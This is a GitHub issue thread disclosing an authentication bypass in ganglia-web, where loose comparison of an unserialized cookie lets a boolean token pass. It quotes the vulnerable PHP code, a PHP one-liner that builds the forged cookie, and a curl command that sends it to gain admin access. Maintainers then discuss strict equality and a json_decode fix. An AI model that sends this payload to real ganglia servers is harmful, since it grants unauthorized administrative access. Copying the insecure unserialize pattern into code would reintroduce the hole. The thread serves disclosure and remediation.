[Security] auth bypass

[d0znpp]

It's easy to bypass auth by using boolean serialization like this: $ php -r "echo urlencode(serialize(array('user'=>'admin', 'group'=>'admin', 'token'=>true)));"

Vulnerable code listed below: https://github.com/ganglia/ganglia-web/blob/4e98ea69e0e18b388cdc73809ce54843a16ff87b/lib/GangliaAuth.php#L34-L46

if(isSet($_COOKIE['ganglia_auth'])) {
  $cookie = $_COOKIE['ganglia_auth'];
  // magic quotes will break unserialization
  if($this->getMagicQuotesGpc()) {
    $cookie = stripslashes($cookie);
  }
  $data = unserialize($cookie);
  if(array_keys($data) != array('user','group','token')) {
    return false;
  }
  if($this->getAuthToken($data['user']) == $data['token']) {

// Found by d90.andrew // Exploit: curl -H 'Cookie: a%3A3%3A%7Bs%3A4%3A%22user%22%3Bs%3A5%3A%22admin%22%3Bs%3A5%3A%22group%22%3Bs%3A5%3A%22admin%22%3Bs%3A5%3A%22token%22%3Bb%3A1%3B%7D' http://ganglia.local/ganglia/

[vvuksan]

Thanks for reporting. We'll look into fixing this shortly cc/ @alexdean

[alexdean]

phew. been a while since i was in this code. sounds like strict equality checking would resolve the problem?

if($this->getAuthToken($data['user']) === $data['token']) {

[d0znpp]

Yes. But i'm strongly recommend to replace unserialize() to json_decode().

[zveriu]

Some more Ganglia security info: http://exploit-db.com/exploits/38030/ , http://www.s3.eurecom.fr/docs/spc15_costin.pdf

[Jehops]

Is there an ETA for a fix?

[alexdean]

I think the fix I mentioned above will be sufficient, but I don't have a dev environment set up to confirm with. I don't think it's likely I'll have time to set one up in the near future.

[vvuksan]

Per d0znpp suggestion I will be changing serialization to use json_encode/decode.

[vvuksan]

I will try to get a release published by Friday 10/2/2015

[Jehops]

FreeBSD port updated. Thanks

[S4lt5]

Just a heads up, the popular container versions still use this, and are vulnerable